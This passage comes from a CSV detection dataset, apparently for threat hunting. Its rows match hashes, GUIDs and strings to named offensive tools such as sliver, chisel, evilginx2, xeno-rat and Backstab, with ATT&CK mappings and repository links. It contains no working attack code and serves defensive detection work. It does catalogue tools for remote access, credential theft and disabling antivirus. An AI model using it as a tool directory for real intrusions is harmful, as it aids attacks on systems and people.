T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*a0520b0aa5b53fc9f4f2257be26377776ed65ad998a2b515e62b28a8065554f3*",".{0,1000}a0520b0aa5b53fc9f4f2257be26377776ed65ad998a2b515e62b28a8065554f3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*a0595728f0d3fbcc2cb434ad9af104158c349cc05a360e037ee027529bde97d1*",".{0,1000}a0595728f0d3fbcc2cb434ad9af104158c349cc05a360e037ee027529bde97d1.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - 
T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","file_hash","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*a06482e7f00958c2c66cf33a59818551f697bd7f3a601fa227e97d75a5a1c142*",".{0,1000}a06482e7f00958c2c66cf33a59818551f697bd7f3a601fa227e97d75a5a1c142.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*a06cd42be641036f7d0adb765468209f27d88ce00b8df151a01022461e878bb2*",".{0,1000}a06cd42be641036f7d0adb765468209f27d88ce00b8df151a01022461e878bb2.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*a07f6b1395eed1e18701aa02692a381226f45f9bc51d8fd1ec0b800d7583f196*",".{0,1000}a07f6b1395eed1e18701aa02692a381226f45f9bc51d8fd1ec0b800d7583f196.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a08b192f7e3409689c1e8c09dab2093623632dd3fae39b56f6eb85ccd72f3f1d*",".{0,1000}a08b192f7e3409689c1e8c09dab2093623632dd3fae39b56f6eb85ccd72f3f1d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*a0ac483af35fd96f00e099dfea72fcd1a07c0d946e806212c73705a7b82b7b32*",".{0,1000}a0ac483af35fd96f00e099dfea72fcd1a07c0d946e806212c73705a7b82b7b32.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a0acc8bea0d7e8ecacd1b7545e073b7575c28ad9be6464e1e756ba63084b9cd0*",".{0,1000}a0acc8bea0d7e8ecacd1b7545e073b7575c28ad9be6464e1e756ba63084b9cd0.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","0","N/A","9","2","157","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z" "*A0B3C96CA89770ED04E37D43188427E0016B42B03C0102216C5F6A785B942BD3*",".{0,1000}A0B3C96CA89770ED04E37D43188427E0016B42B03C0102216C5F6A785B942BD3.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*a0c0fba4ea509e8ff5ec12e60299e0d08f83dcdd5edd5ceb10d18fc3af5d830b*",".{0,1000}a0c0fba4ea509e8ff5ec12e60299e0d08f83dcdd5edd5ceb10d18fc3af5d830b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*a0e17777243f0190053238f503971fc85321ffa8dc12b80bc50b93a2c0d3ea23*",".{0,1000}a0e17777243f0190053238f503971fc85321ffa8dc12b80bc50b93a2c0d3ea23.{0,1000}","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","0","N/A","10","4","363","71","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z" "*a0e67820a910a6441635cb9b663494bc7b0b72c5d81079f14092a3017c5e9739*",".{0,1000}a0e67820a910a6441635cb9b663494bc7b0b72c5d81079f14092a3017c5e9739.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*A0E7B538-F719-47B8-8BE4-A82C933F5753*",".{0,1000}A0E7B538\-F719\-47B8\-8BE4\-A82C933F5753.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","0","N/A","N/A","10","1309","231","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" "*A0F044C5-D910-4720-B082-58824E372281*",".{0,1000}A0F044C5\-D910\-4720\-B082\-58824E372281.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" 
"*a0f8f1ce4928854b11afe7fdc17cf5a932cecb00ddc626e5b9377c5de260cad2*",".{0,1000}a0f8f1ce4928854b11afe7fdc17cf5a932cecb00ddc626e5b9377c5de260cad2.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*a0rtega/metame*",".{0,1000}a0rtega\/metame.{0,1000}","offensive_tool_keyword","metame","metame is a metamorphic code engine for arbitrary executables","T1027 - T1059.003 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/a0rtega/metame","1","1","N/A","N/A","6","563","87","2019-10-06T18:24:14Z","2016-08-07T13:56:57Z" "*A11E7DAE-21F2-46A8-991E-D38DEBE1650F*",".{0,1000}A11E7DAE\-21F2\-46A8\-991E\-D38DEBE1650F.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","9","1","70","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z" "*a126db530bf2f613db366cf3f51d7a6f1894a2e6ccdd062eb1c454305b4b29eb*",".{0,1000}a126db530bf2f613db366cf3f51d7a6f1894a2e6ccdd062eb1c454305b4b29eb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a129c27027fde0ed374443a6ee7282694e44b670e00cf13b8771fcbc01174cd7*",".{0,1000}a129c27027fde0ed374443a6ee7282694e44b670e00cf13b8771fcbc01174cd7.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*A138FC2A-7BFF-4B3C-94A0-62A8BC01E8C0*",".{0,1000}A138FC2A\-7BFF\-4B3C\-94A0\-62A8BC01E8C0.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*A13BGD = base64.b64decode(A13BGD)*",".{0,1000}A13BGD\s\=\s\sbase64\.b64decode\(A13BGD\).{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*a15bb4faba020d217016fde6e231074a*",".{0,1000}a15bb4faba020d217016fde6e231074a.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*a16a8ed5999b3b90c7f5a7a80b7a55fe62941d3a1300ea8f0fcdd8550e93a947*",".{0,1000}a16a8ed5999b3b90c7f5a7a80b7a55fe62941d3a1300ea8f0fcdd8550e93a947.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*a172c88c5af8e591bd8aa539973f62f242b368157ea187d9dbfee8616b51d5c1*",".{0,1000}a172c88c5af8e591bd8aa539973f62f242b368157ea187d9dbfee8616b51d5c1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*A17656B2-42D1-42CD-B76D-9B60F637BCB5*",".{0,1000}A17656B2\-42D1\-42CD\-B76D\-9B60F637BCB5.{0,1000}","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","0","N/A","7","3","274","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" "*a18ad37ac14721d1aab3478bdb2d5534b5035dfb9b3fa5d0945f4d5252936e51*",".{0,1000}a18ad37ac14721d1aab3478bdb2d5534b5035dfb9b3fa5d0945f4d5252936e51.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence 
technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","9","2","166","47","2022-09-02T08:43:14Z","2018-07-14T18:48:51Z" "*A1A949A4-5CE4-4FCF-A3B9-A2290EA46086*",".{0,1000}A1A949A4\-5CE4\-4FCF\-A3B9\-A2290EA46086.{0,1000}","offensive_tool_keyword","ShimDB","Shim database persistence (Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","0","N/A","9","1","35","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z" "*a1b10058ecfda37d1e138537856103279a326ce5bf8fa3ac1ab8909aed8632f0*",".{0,1000}a1b10058ecfda37d1e138537856103279a326ce5bf8fa3ac1ab8909aed8632f0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a1b25d3133a37cefe944c0082272520694f00d4e233e7644d0e2897d433f1bf5*",".{0,1000}a1b25d3133a37cefe944c0082272520694f00d4e233e7644d0e2897d433f1bf5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a1b3d36a9cc4bc118c646ae5430a6e0fc811f2ec3614a3de9682b5c07eaade2d*",".{0,1000}a1b3d36a9cc4bc118c646ae5430a6e0fc811f2ec3614a3de9682b5c07eaade2d.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","0","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*a1dcb84528551c983c11159b99c9d9ba1d3aa75659d9a16a4ca8204a6ada397d*",".{0,1000}a1dcb84528551c983c11159b99c9d9ba1d3aa75659d9a16a4ca8204a6ada397d.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*a1dd724e09ca85a8265c4486f699ab32882e7204a09f895397ab0fb02e37559e*",".{0,1000}a1dd724e09ca85a8265c4486f699ab32882e7204a09f895397ab0fb02e37559e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*A1ECD50DA8AAE5734A5F5C4A6A951B5F3C99CC4FB939AC60EF5EE19896CA23A0*",".{0,1000}A1ECD50DA8AAE5734A5F5C4A6A951B5F3C99CC4FB939AC60EF5EE19896CA23A0.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*A1F54816-3FBA-4A71-9D26-D31C6BE9CF01*",".{0,1000}A1F54816\-3FBA\-4A71\-9D26\-D31C6BE9CF01.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*a201bc3c2d47775b39cd90b32eb390e7*",".{0,1000}a201bc3c2d47775b39cd90b32eb390e7.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*A220F564-41CB-46F5-9938-FEFD87819771*",".{0,1000}A220F564\-41CB\-46F5\-9938\-FEFD87819771.{0,1000}","offensive_tool_keyword","WDBypass","Disable Windows Defender (+ UAC Bypass, + Upgrade to SYSTEM)","T1089 - T1562.001 - T1548.002","TA0005 - TA0040 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://bitbucket.org/evilgreyswork/wd-uac/downloads/","1","0","https://blog.injectexp.dev/2024/02/28/disable-windows-defender-uac-bypass-upgrade-to-system/","10","10","N/A","N/A","N/A","N/A" "*a222df9c30fc7adacb7553a9899a3512e18b9e8d2b735bcd5210c800ba99b243*",".{0,1000}a222df9c30fc7adacb7553a9899a3512e18b9e8d2b735bcd5210c800ba99b243.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a239aa784fa1dfdd3bb50c20c21b03dbc3ce364f940bec5d23faca835c2e5417*",".{0,1000}a239aa784fa1dfdd3bb50c20c21b03dbc3ce364f940bec5d23faca835c2e5417.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a243a5df3e04b3a555b3f506b36037d0093a22c0b8e5842a8890bc4610855cdb*",".{0,1000}a243a5df3e04b3a555b3f506b36037d0093a22c0b8e5842a8890bc4610855cdb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a25b9df135c7a09348526cb0ffdd1e486b7cc6c16df811d83ef1d5402ec1f8ad*",".{0,1000}a25b9df135c7a09348526cb0ffdd1e486b7cc6c16df811d83ef1d5402ec1f8ad.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*a25c5e7baec3573c2a78872808c709d702714f3a11e57d06b62244c3eca2a834*",".{0,1000}a25c5e7baec3573c2a78872808c709d702714f3a11e57d06b62244c3eca2a834.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*a276ed1739c3380b2e918da23ddac04cc117e17e08dac219bb4f82783f9f9850*",".{0,1000}a276ed1739c3380b2e918da23ddac04cc117e17e08dac219bb4f82783f9f9850.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*a280f960cb4fc01ec2dbb4fe56f17122523878a9ece3713868244fbd95e7d7e6*",".{0,1000}a280f960cb4fc01ec2dbb4fe56f17122523878a9ece3713868244fbd95e7d7e6.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","N/A","3","10","27","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z" "*a2b402f23bed2afebdda5ca21f7bc705a021ad86a35676cd3b55c7aa56406e0f*",".{0,1000}a2b402f23bed2afebdda5ca21f7bc705a021ad86a35676cd3b55c7aa56406e0f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*a2c2db4fb0e2ec86fbdda64d1fdf5a084d036073ffd366c1c56336c4c5c95bf1*",".{0,1000}a2c2db4fb0e2ec86fbdda64d1fdf5a084d036073ffd366c1c56336c4c5c95bf1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*a2d412b6feac0c34d148158e5791940e5060bf4b9e6db33e7c444bf715553dc6*",".{0,1000}a2d412b6feac0c34d148158e5791940e5060bf4b9e6db33e7c444bf715553dc6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*a314666c9d3b9d80540bb50378fe104b1c509fa239bc80567f26492f76c526b0*",".{0,1000}a314666c9d3b9d80540bb50378fe104b1c509fa239bc80567f26492f76c526b0.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the 
